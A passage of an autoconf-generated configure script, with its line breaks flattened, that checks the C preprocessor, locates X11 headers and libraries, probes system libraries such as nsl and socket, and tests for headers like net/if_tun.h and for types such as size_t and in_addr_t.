cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_c_try_cpp "$LINENO" then : # Broken: success on invalid input. continue else case e in #( e) # Passes both tests. ac_preproc_ok=: break ;; esac fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of 'break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok then : break fi done ac_cv_prog_CPP=$CPP ;; esac fi CPP=$ac_cv_prog_CPP else ac_cv_prog_CPP=$CPP fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CPP" >&5 printf "%s\n" "$CPP" >&6; } ac_preproc_ok=false for ac_c_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include Syntax error _ACEOF if ac_fn_c_try_cpp "$LINENO" then : else case e in #( e) # Broken: fails on valid input. continue ;; esac fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane cases. Now check whether nonexistent headers # can be detected and how. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_c_try_cpp "$LINENO" then : # Broken: success on invalid input. continue else case e in #( e) # Passes both tests. ac_preproc_ok=: break ;; esac fi rm -f conftest.err conftest.i conftest.$ac_ext done # Because of 'break', _AC_PREPROC_IFELSE's cleaning code was skipped. rm -f conftest.i conftest.err conftest.$ac_ext if $ac_preproc_ok then : else case e in #( e) { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error $? "C preprocessor \"$CPP\" fails sanity check See 'config.log' for more details" "$LINENO" 5; } ;; esac fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for X" >&5 printf %s "checking for X... " >&6; } # Check whether --with-x was given. if test ${with_x+y} then : withval=$with_x; fi # $have_x is 'yes', 'no', 'disabled', or empty when we do not yet know. if test "x$with_x" = xno; then # The user explicitly disabled X. have_x=disabled else case $x_includes,$x_libraries in #( *\'*) as_fn_error $? "cannot use X directory names containing '" "$LINENO" 5;; #( *,NONE | NONE,*) if test ${ac_cv_have_x+y} then : printf %s "(cached) " >&6 else case e in #( e) # One or both of the vars are not set, and there is no cached value. ac_x_includes=no ac_x_libraries=no # Do we need to do anything special at all? ac_save_LIBS=$LIBS LIBS="-lX11 $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include int main (void) { XrmInitialize () ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : # We can compile and link X programs with no special options. ac_x_includes= ac_x_libraries= fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS="$ac_save_LIBS" # If that didn't work, only try xmkmf and file system searches # for native compilation. if test x"$ac_x_includes" = xno && test "$cross_compiling" = no then : rm -f -r conftest.dir if mkdir conftest.dir; then cd conftest.dir cat >Imakefile <<'_ACEOF' incroot: @echo incroot='${INCROOT}' usrlibdir: @echo usrlibdir='${USRLIBDIR}' libdir: @echo libdir='${LIBDIR}' _ACEOF if (export CC; ${XMKMF-xmkmf}) >/dev/null 2>/dev/null && test -f Makefile; then # GNU make sometimes prints "make[1]: Entering ...", which would confuse us. for ac_var in incroot usrlibdir libdir; do eval "ac_im_$ac_var=\`\${MAKE-make} $ac_var 2>/dev/null | sed -n 's/^$ac_var=//p'\`" done # Open Windows xmkmf reportedly sets LIBDIR instead of USRLIBDIR. for ac_extension in a so sl dylib la dll; do if test ! -f "$ac_im_usrlibdir/libX11.$ac_extension" && test -f "$ac_im_libdir/libX11.$ac_extension"; then ac_im_usrlibdir=$ac_im_libdir; break fi done # Screen out bogus values from the imake configuration. They are # bogus both because they are the default anyway, and because # using them would break gcc on systems where it needs fixed includes. case $ac_im_incroot in /usr/include) ac_x_includes= ;; *) test -f "$ac_im_incroot/X11/Xos.h" && ac_x_includes=$ac_im_incroot;; esac case $ac_im_usrlibdir in /usr/lib | /usr/lib64 | /lib | /lib64) ;; *) test -d "$ac_im_usrlibdir" && ac_x_libraries=$ac_im_usrlibdir ;; esac fi cd .. rm -f -r conftest.dir fi # Standard set of common directories for X headers. # Check X11 before X11Rn because it is often a symlink to the current release. ac_x_header_dirs=' /usr/X11/include /usr/X11R7/include /usr/X11R6/include /usr/X11R5/include /usr/X11R4/include /usr/include/X11 /usr/include/X11R7 /usr/include/X11R6 /usr/include/X11R5 /usr/include/X11R4 /usr/local/X11/include /usr/local/X11R7/include /usr/local/X11R6/include /usr/local/X11R5/include /usr/local/X11R4/include /usr/local/include/X11 /usr/local/include/X11R7 /usr/local/include/X11R6 /usr/local/include/X11R5 /usr/local/include/X11R4 /opt/X11/include /usr/X386/include /usr/x386/include /usr/XFree86/include/X11 /usr/include /usr/local/include /usr/unsupported/include /usr/athena/include /usr/local/x11r5/include /usr/lpp/Xamples/include /usr/openwin/include /usr/openwin/share/include' if test "$ac_x_includes" = no; then # Guess where to find include files, by looking for Xlib.h. # First, try using that file with no special directory specified. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include _ACEOF if ac_fn_c_try_cpp "$LINENO" then : # We can compile using X headers with no special include directory. ac_x_includes= else case e in #( e) for ac_dir in $ac_x_header_dirs; do if test -r "$ac_dir/X11/Xlib.h"; then ac_x_includes=$ac_dir break fi done ;; esac fi rm -f conftest.err conftest.i conftest.$ac_ext fi # $ac_x_includes = no if test "$ac_x_libraries" = no; then # Check for the libraries. # See if we find them without any special options. # Don't add to $LIBS permanently. ac_save_LIBS=$LIBS LIBS="-lX11 $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include int main (void) { XrmInitialize () ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : LIBS=$ac_save_LIBS # We can link X programs with no special library path. ac_x_libraries= else case e in #( e) LIBS=$ac_save_LIBS for ac_dir in `printf "%s\n" "$ac_x_includes $ac_x_header_dirs" | sed s/include/lib/g` do # Don't even attempt the hair of trying to link an X program! for ac_extension in a so sl dylib la dll; do if test -r "$ac_dir/libX11.$ac_extension"; then ac_x_libraries=$ac_dir break 2 fi done done ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext fi # $ac_x_libraries = no fi # Record the results. case $ac_x_includes,$ac_x_libraries in #( no,* | *,no | *\'*) : # Didn't find X, or a directory has "'" in its name. ac_cv_have_x="have_x=no" ;; #( *) : # Record where we found X for the cache. ac_cv_have_x="have_x=yes\ ac_x_includes='$ac_x_includes'\ ac_x_libraries='$ac_x_libraries'" ;; esac ;; esac fi ;; #( *) have_x=yes;; esac eval "$ac_cv_have_x" fi # $with_x != no if test "$have_x" != yes; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $have_x" >&5 printf "%s\n" "$have_x" >&6; } no_x=yes else # If each of the values was on the command line, it overrides each guess. test "x$x_includes" = xNONE && x_includes=$ac_x_includes test "x$x_libraries" = xNONE && x_libraries=$ac_x_libraries # Update the cache value to reflect the command line values. ac_cv_have_x="have_x=yes\ ac_x_includes='$x_includes'\ ac_x_libraries='$x_libraries'" { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: libraries $x_libraries, headers $x_includes" >&5 printf "%s\n" "libraries $x_libraries, headers $x_includes" >&6; } fi if test "$no_x" = yes; then # Not all programs may use this symbol, but it does not hurt to define it. printf "%s\n" "#define X_DISPLAY_MISSING 1" >>confdefs.h X_CFLAGS= X_PRE_LIBS= X_LIBS= X_EXTRA_LIBS= else if test -n "$x_includes"; then X_CFLAGS="$X_CFLAGS -I$x_includes" fi # It would also be nice to do this for all -L options, not just this one. if test -n "$x_libraries"; then X_LIBS="$X_LIBS -L$x_libraries" # For Solaris; some versions of Sun CC require a space after -R and # others require no space. Words are not sufficient . . . . { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether -R must be followed by a space" >&5 printf %s "checking whether -R must be followed by a space... " >&6; } ac_xsave_LIBS=$LIBS; LIBS="$LIBS -R$x_libraries" ac_xsave_c_werror_flag=$ac_c_werror_flag ac_c_werror_flag=yes cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } X_LIBS="$X_LIBS -R$x_libraries" else case e in #( e) LIBS="$ac_xsave_LIBS -R $x_libraries" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } X_LIBS="$X_LIBS -R $x_libraries" else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: neither works" >&5 printf "%s\n" "neither works" >&6; } ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext ac_c_werror_flag=$ac_xsave_c_werror_flag LIBS=$ac_xsave_LIBS fi # Check for system-dependent libraries X programs must link with. # Do this before checking for the system-independent R6 libraries # (-lICE), since we may need -lsocket or whatever for X linking. if test "$ISC" = yes; then X_EXTRA_LIBS="$X_EXTRA_LIBS -lnsl_s -linet" else # Martyn Johnson says this is needed for Ultrix, if the X # libraries were built with DECnet support. And Karl Berry says # the Alpha needs dnet_stub (dnet does not exist). ac_xsave_LIBS="$LIBS"; LIBS="$LIBS $X_LIBS -lX11" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char XOpenDisplay (void); int main (void) { return XOpenDisplay (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for dnet_ntoa in -ldnet" >&5 printf %s "checking for dnet_ntoa in -ldnet... " >&6; } if test ${ac_cv_lib_dnet_dnet_ntoa+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-ldnet $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char dnet_ntoa (void); int main (void) { return dnet_ntoa (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_dnet_dnet_ntoa=yes else case e in #( e) ac_cv_lib_dnet_dnet_ntoa=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dnet_dnet_ntoa" >&5 printf "%s\n" "$ac_cv_lib_dnet_dnet_ntoa" >&6; } if test "x$ac_cv_lib_dnet_dnet_ntoa" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -ldnet" fi if test $ac_cv_lib_dnet_dnet_ntoa = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for dnet_ntoa in -ldnet_stub" >&5 printf %s "checking for dnet_ntoa in -ldnet_stub... " >&6; } if test ${ac_cv_lib_dnet_stub_dnet_ntoa+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-ldnet_stub $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char dnet_ntoa (void); int main (void) { return dnet_ntoa (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_dnet_stub_dnet_ntoa=yes else case e in #( e) ac_cv_lib_dnet_stub_dnet_ntoa=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_dnet_stub_dnet_ntoa" >&5 printf "%s\n" "$ac_cv_lib_dnet_stub_dnet_ntoa" >&6; } if test "x$ac_cv_lib_dnet_stub_dnet_ntoa" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -ldnet_stub" fi fi ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS="$ac_xsave_LIBS" # msh@cis.ufl.edu says -lnsl (and -lsocket) are needed for his 386/AT, # to get the SysV transport functions. # Chad R. Larson says the Pyramis MIS-ES running DC/OSx (SVR4) # needs -lnsl. # The nsl library prevents programs from opening the X display # on Irix 5.2, according to T.E. Dickey. # The functions gethostbyname, getservbyname, and inet_addr are # in -lbsd on LynxOS 3.0.1/i386, according to Lars Hecking. ac_fn_c_check_func "$LINENO" "gethostbyname" "ac_cv_func_gethostbyname" if test "x$ac_cv_func_gethostbyname" = xyes then : fi if test $ac_cv_func_gethostbyname = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for gethostbyname in -lnsl" >&5 printf %s "checking for gethostbyname in -lnsl... " >&6; } if test ${ac_cv_lib_nsl_gethostbyname+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lnsl $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char gethostbyname (void); int main (void) { return gethostbyname (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_nsl_gethostbyname=yes else case e in #( e) ac_cv_lib_nsl_gethostbyname=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_nsl_gethostbyname" >&5 printf "%s\n" "$ac_cv_lib_nsl_gethostbyname" >&6; } if test "x$ac_cv_lib_nsl_gethostbyname" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -lnsl" fi if test $ac_cv_lib_nsl_gethostbyname = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for gethostbyname in -lbsd" >&5 printf %s "checking for gethostbyname in -lbsd... " >&6; } if test ${ac_cv_lib_bsd_gethostbyname+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lbsd $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char gethostbyname (void); int main (void) { return gethostbyname (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_bsd_gethostbyname=yes else case e in #( e) ac_cv_lib_bsd_gethostbyname=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_bsd_gethostbyname" >&5 printf "%s\n" "$ac_cv_lib_bsd_gethostbyname" >&6; } if test "x$ac_cv_lib_bsd_gethostbyname" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -lbsd" fi fi fi # lieder@skyler.mavd.honeywell.com says without -lsocket, # socket/setsockopt and other routines are undefined under SCO ODT # 2.0. But -lsocket is broken on IRIX 5.2 (and is not necessary # on later versions), says Simon Leinen: it contains gethostby* # variants that don't use the name server (or something). -lsocket # must be given before -lnsl if both are needed. We assume that # if connect needs -lnsl, so does gethostbyname. ac_fn_c_check_func "$LINENO" "connect" "ac_cv_func_connect" if test "x$ac_cv_func_connect" = xyes then : fi if test $ac_cv_func_connect = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for connect in -lsocket" >&5 printf %s "checking for connect in -lsocket... " >&6; } if test ${ac_cv_lib_socket_connect+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lsocket $X_EXTRA_LIBS $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char connect (void); int main (void) { return connect (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_socket_connect=yes else case e in #( e) ac_cv_lib_socket_connect=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_socket_connect" >&5 printf "%s\n" "$ac_cv_lib_socket_connect" >&6; } if test "x$ac_cv_lib_socket_connect" = xyes then : X_EXTRA_LIBS="-lsocket $X_EXTRA_LIBS" fi fi # Guillermo Gomez says -lposix is necessary on A/UX. ac_fn_c_check_func "$LINENO" "remove" "ac_cv_func_remove" if test "x$ac_cv_func_remove" = xyes then : fi if test $ac_cv_func_remove = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for remove in -lposix" >&5 printf %s "checking for remove in -lposix... " >&6; } if test ${ac_cv_lib_posix_remove+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lposix $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char remove (void); int main (void) { return remove (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_posix_remove=yes else case e in #( e) ac_cv_lib_posix_remove=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_posix_remove" >&5 printf "%s\n" "$ac_cv_lib_posix_remove" >&6; } if test "x$ac_cv_lib_posix_remove" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -lposix" fi fi # BSDI BSD/OS 2.1 needs -lipc for XOpenDisplay. ac_fn_c_check_func "$LINENO" "shmat" "ac_cv_func_shmat" if test "x$ac_cv_func_shmat" = xyes then : fi if test $ac_cv_func_shmat = no; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for shmat in -lipc" >&5 printf %s "checking for shmat in -lipc... " >&6; } if test ${ac_cv_lib_ipc_shmat+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lipc $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char shmat (void); int main (void) { return shmat (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_ipc_shmat=yes else case e in #( e) ac_cv_lib_ipc_shmat=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_ipc_shmat" >&5 printf "%s\n" "$ac_cv_lib_ipc_shmat" >&6; } if test "x$ac_cv_lib_ipc_shmat" = xyes then : X_EXTRA_LIBS="$X_EXTRA_LIBS -lipc" fi fi fi # Check for libraries that X11R6 Xt/Xaw programs need. ac_save_LDFLAGS=$LDFLAGS test -n "$x_libraries" && LDFLAGS="$LDFLAGS -L$x_libraries" # SM needs ICE to (dynamically) link under SunOS 4.x (so we have to # check for ICE first), but we must link in the order -lSM -lICE or # we get undefined symbols. So assume we have SM if we have ICE. # These have to be linked with before -lX11, unlike the other # libraries we check for below, so use a different variable. # John Interrante, Karl Berry { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for IceConnectionNumber in -lICE" >&5 printf %s "checking for IceConnectionNumber in -lICE... " >&6; } if test ${ac_cv_lib_ICE_IceConnectionNumber+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_check_lib_save_LIBS=$LIBS LIBS="-lICE $X_EXTRA_LIBS $LIBS" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ /* Override any GCC internal prototype to avoid an error. Use char because int might match the return type of a GCC builtin and then its argument prototype would still apply. The 'extern "C"' is for builds by C++ compilers; although this is not generally supported in C code supporting it here has little cost and some practical benefit (sr 110532). */ #ifdef __cplusplus extern "C" #endif char IceConnectionNumber (void); int main (void) { return IceConnectionNumber (); ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO" then : ac_cv_lib_ICE_IceConnectionNumber=yes else case e in #( e) ac_cv_lib_ICE_IceConnectionNumber=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam \ conftest$ac_exeext conftest.$ac_ext LIBS=$ac_check_lib_save_LIBS ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_ICE_IceConnectionNumber" >&5 printf "%s\n" "$ac_cv_lib_ICE_IceConnectionNumber" >&6; } if test "x$ac_cv_lib_ICE_IceConnectionNumber" = xyes then : X_PRE_LIBS="$X_PRE_LIBS -lSM -lICE" fi LDFLAGS=$ac_save_LDFLAGS fi ac_header= ac_cache= for ac_item in $ac_header_c_list do if test $ac_cache; then ac_fn_c_check_header_compile "$LINENO" $ac_header ac_cv_header_$ac_cache "$ac_includes_default" if eval test \"x\$ac_cv_header_$ac_cache\" = xyes; then printf "%s\n" "#define $ac_item 1" >> confdefs.h fi ac_header= ac_cache= elif test $ac_header; then ac_cache=$ac_item else ac_header=$ac_item fi done if test $ac_cv_header_stdlib_h = yes && test $ac_cv_header_string_h = yes then : printf "%s\n" "#define STDC_HEADERS 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "err.h" "ac_cv_header_err_h" "$ac_includes_default" if test "x$ac_cv_header_err_h" = xyes then : printf "%s\n" "#define HAVE_ERR_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "fcntl.h" "ac_cv_header_fcntl_h" "$ac_includes_default" if test "x$ac_cv_header_fcntl_h" = xyes then : printf "%s\n" "#define HAVE_FCNTL_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "sys/ioctl.h" "ac_cv_header_sys_ioctl_h" "$ac_includes_default" if test "x$ac_cv_header_sys_ioctl_h" = xyes then : printf "%s\n" "#define HAVE_SYS_IOCTL_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "sys/queue.h" "ac_cv_header_sys_queue_h" "$ac_includes_default" if test "x$ac_cv_header_sys_queue_h" = xyes then : printf "%s\n" "#define HAVE_SYS_QUEUE_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "unistd.h" "ac_cv_header_unistd_h" "$ac_includes_default" if test "x$ac_cv_header_unistd_h" = xyes then : printf "%s\n" "#define HAVE_UNISTD_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "libgen.h" "ac_cv_header_libgen_h" "$ac_includes_default" if test "x$ac_cv_header_libgen_h" = xyes then : printf "%s\n" "#define HAVE_LIBGEN_H 1" >>confdefs.h fi ac_fn_c_check_header_compile "$LINENO" "net/if_tun.h" "ac_cv_header_net_if_tun_h" "$ac_includes_default" if test "x$ac_cv_header_net_if_tun_h" = xyes then : printf "%s\n" "#define HAVE_NET_IF_TUN_H 1" >>confdefs.h fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for an ANSI C-conforming const" >&5 printf %s "checking for an ANSI C-conforming const... " >&6; } if test ${ac_cv_c_const+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { #ifndef __cplusplus /* Ultrix mips cc rejects this sort of thing. */ typedef int charset[2]; const charset cs = { 0, 0 }; /* SunOS 4.1.1 cc rejects this. */ char const *const *pcpcc; char **ppc; /* NEC SVR4.0.2 mips cc rejects this. */ struct point {int x, y;}; static struct point const zero = {0,0}; /* IBM XL C 1.02.0.0 rejects this. It does not let you subtract one const X* pointer from another in an arm of an if-expression whose if-part is not a constant expression */ const char *g = "string"; pcpcc = &g + (g ? g-g : 0); /* HPUX 7.0 cc rejects these. */ ++pcpcc; ppc = (char**) pcpcc; pcpcc = (char const *const *) ppc; { /* SCO 3.2v4 cc rejects this sort of thing. */ char tx; char *t = &tx; char const *s = 0 ? (char *) 0 : (char const *) 0; *t++ = 0; if (s) return 0; } { /* Someone thinks the Sun supposedly-ANSI compiler will reject this. */ int x[] = {25, 17}; const int *foo = &x[0]; ++foo; } { /* Sun SC1.0 ANSI compiler rejects this -- but not the above. */ typedef const int *iptr; iptr p = 0; ++p; } { /* IBM XL C 1.02.0.0 rejects this sort of thing, saying "k.c", line 2.27: 1506-025 (S) Operand must be a modifiable lvalue. */ struct s { int j; const int *ap[3]; } bx; struct s *b = &bx; b->j = 5; } { /* ULTRIX-32 V3.1 (Rev 9) vcc rejects this */ const int foo = 10; if (!foo) return 0; } return !cs[0] && !zero.x; #endif ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : ac_cv_c_const=yes else case e in #( e) ac_cv_c_const=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_const" >&5 printf "%s\n" "$ac_cv_c_const" >&6; } if test $ac_cv_c_const = no; then printf "%s\n" "#define const /**/" >>confdefs.h fi ac_fn_c_check_type "$LINENO" "size_t" "ac_cv_type_size_t" "$ac_includes_default" if test "x$ac_cv_type_size_t" = xyes then : else case e in #( e) printf "%s\n" "#define size_t unsigned int" >>confdefs.h ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether struct tm is in sys/time.h or time.h" >&5 printf %s "checking whether struct tm is in sys/time.h or time.h... " >&6; } if test ${ac_cv_struct_tm+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include #include int main (void) { struct tm tm; int *p = &tm.tm_sec; return !p; ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : ac_cv_struct_tm=time.h else case e in #( e) ac_cv_struct_tm=sys/time.h ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_struct_tm" >&5 printf "%s\n" "$ac_cv_struct_tm" >&6; } if test $ac_cv_struct_tm = sys/time.h; then printf "%s\n" "#define TM_IN_SYS_TIME 1" >>confdefs.h fi ac_fn_c_check_type "$LINENO" "u_int32_t" "ac_cv_type_u_int32_t" "$ac_includes_default" if test "x$ac_cv_type_u_int32_t" = xyes then : else case e in #( e) printf "%s\n" "#define u_int32_t uint32_t" >>confdefs.h ;; esac fi ac_fn_c_check_type "$LINENO" "u_int64_t" "ac_cv_type_u_int64_t" "$ac_includes_default" if test "x$ac_cv_type_u_int64_t" = xyes then : else case e in #( e) printf "%s\n" "#define u_int64_t uint64_t" >>confdefs.h ;; esac fi ac_fn_c_check_type "$LINENO" "in_addr_t" "ac_cv_type_in_addr_t" "$ac_includes_default" if test 